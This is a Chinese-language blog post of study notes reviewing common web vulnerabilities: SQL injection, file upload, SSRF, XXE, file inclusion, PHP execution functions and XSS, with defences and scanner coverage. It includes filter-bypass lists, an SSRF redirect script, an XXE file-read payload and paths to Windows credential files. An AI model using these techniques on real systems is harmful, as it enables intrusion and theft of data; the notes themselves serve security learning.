<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="P1taya">
    
    <title>
        
            web漏洞复习 |
        
        P1taya
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
        <link rel="shortcut icon" href="/images/p1taya.jpg">
    
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/font/css/fontawesome.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/font/css/regular.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/font/css/solid.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/font/css/brands.min.css">
    
        
            
                
<link rel="stylesheet" href="/css/demo1.css">

            
        
    
    <script class="keep-theme-configurations">
    const KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"example.com","root":"/","language":"zh-CN","path":"search.json"}
    KEEP.theme_config = {"base_info":{"primary_color":"#0066cc","title":"P1taya","author":"P1taya","avatar":"/images/p1taya.jpg","logo":"/images/p1taya.jpg","favicon":"/images/p1taya.jpg"},"menu":{"home":"/ || fa-solid fa-home","archives":"/archives || fa-solid fa-box-archive","categories":"/categories || fa-solid fa-layer-group","links":"/links || fa-solid fa-link","about":"/about || fa-solid fa-user-graduate","photos":"/photos || fa-solid fa-image"},"first_screen":{"enable":true,"background_img":"/images/bg.svg","description":"人后的苦尚且还能克服 || 人前的尊严却无比脆弱","hitokoto":false},"social_contact":{"enable":false,"links":{"github":null,"weixin":null,"qq":null,"weibo":null,"zhihu":null,"twitter":null,"x":null,"facebook":null,"email":null}},"scroll":{"progress_bar":false,"percent":false,"hide_header":true},"home":{"announcement":null,"category":true,"tag":true,"post_datetime":"created || fa-solid fa-home","post_datetime_format":"YYYY-MM-DD HH:mm:ss"},"post":{"author_badge":{"enable":true,"level_badge":true,"custom_badge":["One","Two","Three"]},"word_count":{"wordcount":true,"min2read":true},"datetime_format":"YYYY-MM-DD HH:mm:ss","copyright_info":true,"share":false,"reward":{"enable":false,"img_link":null,"text":null}},"code_block":{"tools":{"enable":true,"style":"mac"},"highlight_theme":"obsidian"},"toc":{"enable":true,"number":false,"expand_all":true,"init_open":true,"layout":"right"},"website_count":{"busuanzi_count":{"enable":true,"site_uv":true,"site_pv":true,"page_pv":true}},"local_search":{"enable":true,"preload":false},"comment":{"enable":false,"use":"valine","valine":{"appid":null,"appkey":null,"server_urls":null,"placeholder":null},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null,"proxy":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.21"},"waline":{"server_url":null,"reaction":false,"version":2},"giscus":{"repo":null,"repo_id":null,"category":"Announcements","category_id":null,"reactions_enabled":false},"artalk":{"server":null},"disqus":{"shortname":null}},"rss":{"enable":false},"lazyload":{"enable":true},"cdn":{"enable":true,"provider":"jsdelivr"},"pjax":{"enable":false},"footer":{"since":2022,"word_count":true},"inject":{"enable":true,"css":["/css/demo1.css"],"js":[null]},"root":"","source_data":{"links":[{"name":"小黄dog","link":"https://wuster.store/","avatar":"https://wuster.store/images/favicon.ico"},{"name":"🐶狗and猫","link":"https://fushuling.com/","avatar":"https://fushuling-1309926051.cos.ap-shanghai.myqcloud.com/avatar.jpg"}]},"version":"4.1.1"}
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"}
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"}
    KEEP.language_copy_copyright = {"copy":"复制版权信息","copied":"已复制","title":"原文标题","author":"原文作者","link":"原文链接"}
  </script>
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
</div>



<main class="page-container border-box">
    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left border-box">
            
                <a class="logo-image border-box" href="/">
                    <img src="/images/p1taya.jpg">
                </a>
            
            <a class="site-name border-box" href="/">
               P1taya
            </a>
        </div>

        <div class="right border-box">
            <div class="pc">
                <ul class="menu-list">
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                
                                    <i class="menu-icon fa-solid fa-home"></i>
                                
                                首页
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                
                                    <i class="menu-icon fa-solid fa-box-archive"></i>
                                
                                归档
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/categories"
                            >
                                
                                    <i class="menu-icon fa-solid fa-layer-group"></i>
                                
                                分类
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/links"
                            >
                                
                                    <i class="menu-icon fa-solid fa-link"></i>
                                
                                友链
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/about"
                            >
                                
                                    <i class="menu-icon fa-solid fa-user-graduate"></i>
                                
                                关于
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/photos"
                            >
                                
                                    <i class="menu-icon fa-solid fa-image"></i>
                                
                                相册
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas search fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/"
                    >首页</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives"
                    >归档</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/categories"
                    >分类</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/links"
                    >友链</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/about"
                    >关于</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/photos"
                    >相册</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">
                

                    
<div class="fade-in-down-animation">
    <div class="post-page-container border-box">
        <div class="post-content-container border-box">
            

            <div class="post-content-bottom border-box">
                
                    <div class="post-title">
                        web漏洞复习
                    </div>
                

                
                    <div class="post-header border-box">
                        
                            <div class="avatar-box border-box">
                                <img src="/images/p1taya.jpg">
                            </div>
                        
                        <div class="info-box">
                            <div class="author border-box">
                                <span class="name">P1taya</span>
                                
                                    <span class="author-badge">Lv4</span>
                                
                            </div>
                            <div class="meta-info border-box">
                                

<div class="post-meta-info-container border-box post">
    <div class="post-meta-info border-box">
        

        
            <span class="meta-info-item post-create-date">
                <i class="icon fa-solid fa-calendar-plus"></i>&nbsp;
                <span class="datetime">2022-03-10 23:21:37</span>
            </span>

            <span class="meta-info-item post-update-date">
                <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                <span class="datetime" data-updated="Wed Apr 17 2024 16:43:00 GMT+0800">2024-04-17 16:43:00</span>
            </span>
        

        
            <span class="meta-info-item post-category border-box"><i class="icon fas fa-folder"></i>&nbsp;
                <ul class="post-category-ul">
                    
                            <li class="category-item"><a href="/categories/%E5%A4%8D%E7%8E%B0/">复现</a></li>
                        
                    
                </ul>
            </span>
        

        

        
        
            <span class="meta-info-item post-wordcount">
                <i class="icon fas fa-file-word"></i>&nbsp;<span>6.4k 字</span>
            </span>
        
        
            <span class="meta-info-item post-min2read">
                <i class="icon fas fa-clock"></i>&nbsp;<span>24 分钟</span>
            </span>
        
        
            <span class="meta-info-item post-pv">
                <i class="icon fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
            </span>
        
    </div>

    
</div>

                            </div>
                        </div>
                    </div>
                

                <div class="post-content keep-markdown-body">
                    

                    <h1 id="web漏洞复习"><a href="#web漏洞复习" class="headerlink" title="web漏洞复习"></a>web漏洞复习</h1><h3 id="1-owasp-top-10"><a href="#1-owasp-top-10" class="headerlink" title="1.owasp top 10"></a>1.owasp top 10</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">1.SQL注入</span><br><span class="line">2.失效的身份认证和会话管理</span><br><span class="line">3.跨站脚本攻击XSS</span><br><span class="line">4.直接引用不安全的对象</span><br><span class="line">5.安全配置错误</span><br><span class="line">6.敏感信息泄露</span><br><span class="line">7.缺少功能级的访问控制</span><br><span class="line">8.跨站请求伪造CSRF</span><br><span class="line">9.实验含有已知漏洞的组件</span><br><span class="line">10.未验证的重定向和转发</span><br></pre></td></tr></table></figure>



<h3 id="2-sql注入"><a href="#2-sql注入" class="headerlink" title="2.sql注入"></a>2.sql注入</h3><p><strong>sql注入原理</strong></p>
<blockquote>
<p>产生SQL注入漏洞的根本原因在于代码中没有对用户输入项进行验证和处理便直接拼接</p>
<p>到查询语句中。利用SQL注入漏洞，攻击者可以在应用的查询语句中插入自己的SQL代码并传递</p>
<p>给后台SQL服务器时加以解析并执行。</p>
</blockquote>
<p><strong>sql注入类型</strong></p>
<p>按照注入点类型分类可分为</p>
<ul>
<li>数字型注入</li>
<li>字符型注入</li>
</ul>
<p>按照执行效果分类可分为</p>
<ul>
<li>盲注</li>
<li>报错注入</li>
<li>联合查询</li>
<li>堆叠注入</li>
<li>宽字节注入</li>
<li>二次注入</li>
</ul>
<p><strong>sql注入危害</strong></p>
<ol>
<li>攻击者未经授权可以访问数据库中的数据，盗取用户的隐私以及个人信息，造成用户的信息泄露。</li>
<li>可以对数据库的数据进行增加或删除操作，例如私自添加或删除管理员账号。</li>
<li>如果网站目录存在写入权限，可以写入网页木马。攻击者进而可以对网页进行篡改，发布一些违法信息等。</li>
<li>经过提权等步骤，服务器最高权限被攻击者获取。攻击者可以远程控制服务器，安装后门，得以修改或控制操作系统。</li>
</ol>
<p><strong>报错注入常用函数</strong></p>
<ul>
<li>updatexml()</li>
<li>extractvalue()</li>
<li>floor()</li>
</ul>
<p><strong>sql注入绕过</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">绕过空格（注释符/* */，%a0）</span><br><span class="line">括号绕过空格</span><br><span class="line">引号绕过（使用十六进制）</span><br><span class="line">逗号绕过（limit使用from或者offset）（substr使用from for属于逗号）</span><br><span class="line">比较符号（&lt;&gt;）绕过（使用greatest()）</span><br><span class="line">and=&amp;&amp;  or=||</span><br><span class="line">=  用 like 绕过</span><br><span class="line">大小写绕过</span><br><span class="line">双写绕过</span><br><span class="line">特殊编码绕过</span><br></pre></td></tr></table></figure>



<p><strong>sql注入经常出现在什么地方</strong></p>
<ul>
<li>登录界面</li>
<li>删除处</li>
<li>搜索框</li>
</ul>
<p><strong>Sql server 相关知识</strong></p>
<p><a class="link"   target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/74546690" >https://zhuanlan.zhihu.com/p/74546690<i class="fas fa-external-link-alt"></i></a></p>
<h3 id="3-文件上传"><a href="#3-文件上传" class="headerlink" title="3.文件上传"></a>3.文件上传</h3><p><strong>文件上传的危害？</strong></p>
<blockquote>
<p>文件上传漏洞危害极大因为可以直接上传恶意代码到服务器上，可能会造成服务器的<strong>网页篡改、网站被挂马、服务器被远程控制、被安装后门等严重的后果</strong></p>
</blockquote>
<p><strong>文件上传怎么防御</strong></p>
<ul>
<li>客户端检测检测（js检测）</li>
<li>服务端检测(MIME检测)</li>
<li>服务端检测（扩展名检测）</li>
<li>增加白名单</li>
</ul>
<p><strong>文件上传怎么绕过(白名单，黑名单，前端等)？</strong></p>
<ul>
<li>.htaccess绕过</li>
<li>.user.ini绕过</li>
<li>%00截断绕过</li>
</ul>
<h3 id="3-SSRF漏洞"><a href="#3-SSRF漏洞" class="headerlink" title="3.SSRF漏洞"></a>3.SSRF漏洞</h3><blockquote>
<p>漏洞原理 <strong>SSRF</strong>（Server-Side Request  Forgery，服务器端请求伪造）是一种由攻击者构造请求，由服务器端发起请求的安全漏洞，本质上是属于信息泄露漏洞。  ssrf攻击的目标是从外网无法访问的内部系统（正是因为他是有服务器端发起的，所以他能够请求到与他相连而与外网隔离的内部系统）  很多web应用都提供了从其他的服务器上获取数据的功能（百度识图，给出一串URL就能识别出图片）。  使用用户指定的URL，web应用可以获取图片，下载文件，读取文件内容等。  这个功能如果被恶意使用，可以利用存在缺陷的web应用作为代理，攻击远程和本地的服务器。 一般情况下，  SSRF攻击的目标是外网无法访问的内部系统，黑客可以利用SSRF漏洞获取内部系统的一些信息 。</p>
</blockquote>
<p><strong>ssrf漏洞利用</strong></p>
<ul>
<li>能扫描内部网络，获取端口，服务信息</li>
<li>攻击运行在内网或本地的应用程序。</li>
<li>对内网web进行指纹识别</li>
<li>对内部主机和端口发送请求包进行攻击</li>
<li>file协议读取本地文件</li>
</ul>
<p><strong>Ssrf漏洞防御</strong></p>
<ul>
<li>限制请求的端口只能为Web端口，只允许访问HTTP和HTTPS的请求</li>
<li>限制不能访问内网的IP，以防止对内网进行攻击</li>
<li>屏蔽返回的详细信息</li>
</ul>
<p><strong>Ssrf漏洞绕过</strong></p>
<ul>
<li><p>@符号绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://www.xxx.com@www.kxsy.work/</span><br></pre></td></tr></table></figure>
</li>
<li><p>IP地址转换</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">例如：120.26.86.156</span><br><span class="line">二进制 = 1111000000110100101011010011100</span><br><span class="line">十六进制 = 0x781A569C</span><br><span class="line">十进制 = 2014992028</span><br></pre></td></tr></table></figure>
</li>
<li><p>转换短网址</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">https://www.985.so/</span><br><span class="line">例：http://www.kxsy.work/ = http://u6.gg/ks69x</span><br></pre></td></tr></table></figure>
</li>
<li><p>特殊符号替换绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">例：</span><br><span class="line">http://www.kxsy.work/ = http://www。kxsy。work/</span><br><span class="line">localhost或者0.0.0.0</span><br></pre></td></tr></table></figure>
</li>
<li><p>302跳转绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php  </span><br><span class="line">$schema = $_GET[&#x27;s&#x27;];</span><br><span class="line">$ip     = $_GET[&#x27;i&#x27;];</span><br><span class="line">$port   = $_GET[&#x27;p&#x27;];</span><br><span class="line">$query  = $_GET[&#x27;q&#x27;];</span><br><span class="line">if(empty($port))&#123;  </span><br><span class="line">    header(&quot;Location: $schema://$ip/$query&quot;); </span><br><span class="line">&#125; else &#123;</span><br><span class="line">    header(&quot;Location: $schema://$ip:$port/$query&quot;); </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p>xio.ip绕过，会解析到子域</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">http://10.0.0.1.xip.io = 10.0.0.1</span><br><span class="line">www.10.0.0.1.xip.io= 10.0.0.1</span><br><span class="line">http://mysite.10.0.0.1.xip.io = 10.0.0.1</span><br><span class="line">foo.http://bar.10.0.0.1.xip.io = 10.0.0.1</span><br><span class="line">10.0.0.1.xip.name resolves to 10.0.0.1</span><br><span class="line">www.10.0.0.2.xip.name resolves to 10.0.0.2</span><br><span class="line">foo.10.0.0.3.xip.name resolves to 10.0.0.3</span><br><span class="line">bar.baz.10.0.0.4.xip.name resolves to 10.0.0.4</span><br></pre></td></tr></table></figure>
</li>
<li><p>用Enclosed alphanumerics绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">利用Enclosed alphanumerics</span><br><span class="line">ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ &gt;&gt;&gt; http://example.com</span><br></pre></td></tr></table></figure></li>
</ul>
<h3 id="4-XXE漏洞"><a href="#4-XXE漏洞" class="headerlink" title="4.XXE漏洞"></a>4.XXE漏洞</h3><p><strong>XXE漏洞原理</strong></p>
<blockquote>
<p>XXE全称为XML External Entity Injection即XMl外部实体注入漏洞</p>
</blockquote>
<p>XXE漏洞触发点往往是可以上传xml文件的位置，没有对xml文件进行过滤，导致可加载恶意外部文件和代码，造成任意文件读取，命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害 要了解xxe漏洞，那么一定得先明白基础知识，了解xml文档的基础组成</p>
<p><strong>XXE漏洞利用</strong></p>
<p>在php环境下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$xml=simplexml_load_string($_GET[&#x27;xml&#x27;]);</span><br><span class="line">print_r($xml);</span><br><span class="line">?&gt;	</span><br></pre></td></tr></table></figure>

<p>将以下xml代码进行URL编码，读取文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;</span><br><span class="line">&lt;!DOCTYPE playwin [</span><br><span class="line">&lt;!ENTITY name SYSTEM &quot;file:///D:/phpStudy/PHPTutorial/WWW/1.txt&quot;&gt;</span><br><span class="line">]&gt;</span><br><span class="line">&lt;resume&gt;</span><br><span class="line">&lt;name&gt; &amp;name; &lt;/name&gt;</span><br><span class="line">&lt;/resume&gt;</span><br></pre></td></tr></table></figure>





<p><strong>Xxe漏洞支持的伪协议</strong></p>
<p>不同的程序支持协议不同</p>
<h3 id="5-文件包含漏洞"><a href="#5-文件包含漏洞" class="headerlink" title="5.文件包含漏洞"></a>5.文件包含漏洞</h3><p><strong>文件包含的函数</strong></p>
<p>php中有四种</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">require() // 只在执行到此函数时才去包含文件，若包含的文件不存在产生警告，程序继续运行</span><br><span class="line"></span><br><span class="line">require_once() // 如果一个文件已经被包含过，则不会在包含它</span><br><span class="line"></span><br><span class="line">include() // 程序一运行文件便会包含进来，若包含文件不存在产生致命错误，程序终止运行</span><br><span class="line"></span><br><span class="line">include_once() // 如果一个文件已经被包含过，则不会在包含它</span><br></pre></td></tr></table></figure>



<p><strong>文件包含支持的伪协议</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">php的支持</span><br><span class="line">php://filter</span><br><span class="line">php://input</span><br><span class="line">file://</span><br><span class="line">phar://</span><br><span class="line">zip://</span><br><span class="line">data://</span><br></pre></td></tr></table></figure>



<p><strong>文件包含利用</strong></p>
<p>包含日志文件getshell</p>
<p>包含敏感文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">C:\boot.ini //查看系统版本</span><br><span class="line">C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置文件</span><br><span class="line">C:\Windows\repair\sam //存储系统初次安装的密码</span><br><span class="line">C:\Program Files\mysql\my.ini //Mysql配置</span><br><span class="line">C:\Program Files\mysql\data\mysql\user.MYD //Mysql root</span><br><span class="line">C:\Windows\php.ini //php配置信息</span><br><span class="line">C:\Windows\my.ini //Mysql配置信息</span><br><span class="line">C:\Windows\win.ini //Windows系统的一个基本系统配置文件</span><br></pre></td></tr></table></figure>





<h3 id="6-Php命令执行，php代码执行相"><a href="#6-Php命令执行，php代码执行相" class="headerlink" title="6.Php命令执行，php代码执行相"></a>6.Php命令执行，php代码执行相</h3><p><strong>代码执行相关函数</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">assert()</span><br><span class="line">eval()</span><br><span class="line">call_user_func()</span><br><span class="line">call_user_func_array()</span><br><span class="line">preg_replace()  //7.0版本后已经不存在</span><br><span class="line">array_map()</span><br><span class="line">Usort()</span><br></pre></td></tr></table></figure>

<p><strong>命令执行相关函数</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">system()</span><br><span class="line">exec()</span><br><span class="line">passthru()</span><br><span class="line">shell_exec()</span><br><span class="line">poopen()</span><br></pre></td></tr></table></figure>



<h3 id="7-XSS漏洞"><a href="#7-XSS漏洞" class="headerlink" title="7.XSS漏洞"></a>7.XSS漏洞</h3><p><strong>XSS漏洞原理</strong></p>
<blockquote>
<p>HTML是一种超文本标记语言，通过将一些字符特殊地对待来区别文本和标记，例如，小于符号（&lt;）被看作是HTML标签的开始。当动态页面中插入的内容含有这些特殊字符时，正好你要访问的服务器并没有对用户的输入进行安全方面的验证，用户浏览器会将其误认为是插入了HTML标签，当这些HTML标签引入了一段JavaScript脚本时，这些脚本程序就将会在用户浏览器中执行。所以，当这些特殊字符不能被动态页面检查或检查出现失误时，就将会产生XSS漏洞</p>
</blockquote>
<p><strong>xss漏洞类型</strong></p>
<blockquote>
<p>1.反射型</p>
<p>反射型 XSS 一般是攻击者通过特定手法（如电子邮件），诱使用户去访问一个包含恶意代码的 URL，当受害者点击这些专门设计的链接的时候，恶意代码会直接在受害者主机上的浏览器执行。</p>
<p>对于访问者而言是一次性的，具体表现在我们把我们的恶意脚本通过 URL 的方式传递给了服务器，而服务器则只是不加处理的把脚本“反射”回访问者的浏览器而使访问者的浏览器执行相应的脚本。反射型 XSS 的触发有后端的参与，要避免反射性 XSS，必须需要后端的协调，后端解析前端的数据时首先做相关的字串检测和转义处理。</p>
<p>此类 XSS 通常出现在网站的搜索栏、用户登录口等地方，常用来窃取客户端 Cookies 或进行钓鱼欺骗。<br>2.存储型</p>
<p>攻击者事先将恶意代码上传或储存到漏洞服务器中，只要受害者浏览包含此恶意代码的页面就会执行恶意代码。这就意味着只要访问了这个页面的访客，都有可能会执行这段恶意脚本，因此储存型XSS的危害会更大。</p>
<p>存储型 XSS 一般出现在网站留言、评论、博客日志等交互处，恶意脚本存储到客户端或者服务端的数据库中。<br>3.DOM型</p>
<p>客户端的脚本程序可以动态地检查和修改页面内容，而不依赖于服务器端的数据。基于DOM的XSS，也就是web server不参与，仅仅涉及到浏览器的XSS。比如根据用户的例如客户端如从 URL 中提取数据并在本地执行，如果用户在客户端输入的数据包含了恶意的 JavaScript 脚本，而这些脚本没有经过适当的过滤和消毒，那么应用程序就可能受到 DOM-based XSS 攻击。需要特别注意以下的用户输入源 document.URL、 location.hash、 location.search、 document.referrer 等。</p>
</blockquote>
<p><strong>Dom型xss和反射型xss的区别</strong></p>
<p>DOM型xss和别的xss最大的区别就是它不经过服务器，仅仅是通过网页本身的JavaScript进行渲染触发的</p>
<p><strong>Xss漏洞的危害</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">1.窃取用户Cookie</span><br><span class="line">2.后台增删改文章</span><br><span class="line">3.XSS钓鱼攻击</span><br><span class="line">4.利用XSS漏洞进行传播和修改网页代码</span><br><span class="line">5.XSS蠕虫攻击</span><br><span class="line">6.网站重定向</span><br><span class="line">7.获取键盘记录</span><br><span class="line">8.获取用户信息等</span><br></pre></td></tr></table></figure>



<p><strong>XSS漏洞防御</strong></p>
<blockquote>
<p>1、对输入和URL参数进行过滤(白名单和黑名单)</p>
<p>检查用户输入的数据中是否包含一些特殊字符，如&lt;、&gt;、’、“等，发现存在特殊字符，将这些特殊字符过滤或者编码。<br>2、HTML实体编码</p>
<p>字符串js编码转换成实体html编码的方法（防范XSS攻击）<br><a class="link"   target="_blank" rel="noopener" href="https://www.cnblogs.com/dearxinli/p/5466286.html" >https://www.cnblogs.com/dearxinli/p/5466286.html<i class="fas fa-external-link-alt"></i></a><br>3、对输出内容进行编码</p>
<p>在变量输出到HTML页面时，可以使用编码或转义的方式来防御XSS攻击。</p>
</blockquote>
<h3 id="8-常见的解析漏洞"><a href="#8-常见的解析漏洞" class="headerlink" title="8.常见的解析漏洞"></a>8.常见的解析漏洞</h3><p><strong>Nginx</strong></p>
<blockquote>
<p><a class="link"   target="_blank" rel="noopener" href="https://blog.csdn.net/Spontaneous_0/article/details/129106641" >https://blog.csdn.net/Spontaneous_0/article/details/129106641<i class="fas fa-external-link-alt"></i></a></p>
</blockquote>
<p><strong>Apache</strong></p>
<blockquote>
<p><a class="link"   target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_44174581/article/details/119387616" >https://blog.csdn.net/weixin_44174581/article/details/119387616<i class="fas fa-external-link-alt"></i></a></p>
</blockquote>
<p><strong>lls</strong></p>
<blockquote>
<p><a class="link"   target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_43625577/article/details/91971796" >https://blog.csdn.net/weixin_43625577/article/details/91971796<i class="fas fa-external-link-alt"></i></a></p>
</blockquote>
<h3 id="9-常见的漏扫工具支持扫描的漏洞类型"><a href="#9-常见的漏扫工具支持扫描的漏洞类型" class="headerlink" title="9.常见的漏扫工具支持扫描的漏洞类型"></a>9.常见的漏扫工具支持扫描的漏洞类型</h3><p> <strong>Xray</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">XSS漏洞检测 (key: xss)</span><br><span class="line">SQL 注入检测 (key: sqldet)</span><br><span class="line">命令/代码注入检测 (key: cmd-injection)</span><br><span class="line">目录枚举 (key: dirscan)</span><br><span class="line">路径穿越检测 (key: path-traversal)</span><br><span class="line">XML 实体注入检测 (key: xxe)</span><br><span class="line">文件上传检测 (key: upload)</span><br><span class="line">弱口令检测 (key: brute-force)</span><br><span class="line">jsonp 检测 (key: jsonp)</span><br><span class="line">ssrf 检测 (key: ssrf)</span><br><span class="line">基线检查 (key: baseline)</span><br><span class="line">任意跳转检测 (key: redirect)</span><br><span class="line">CRLF 注入 (key: crlf-injection)</span><br><span class="line">Struts2 系列漏洞检测 (高级版，key: struts)</span><br><span class="line">Thinkphp系列漏洞检测 (高级版，key: thinkphp)</span><br><span class="line">POC 框架 (key: phantasm)</span><br></pre></td></tr></table></figure>

<p>Avws</p>
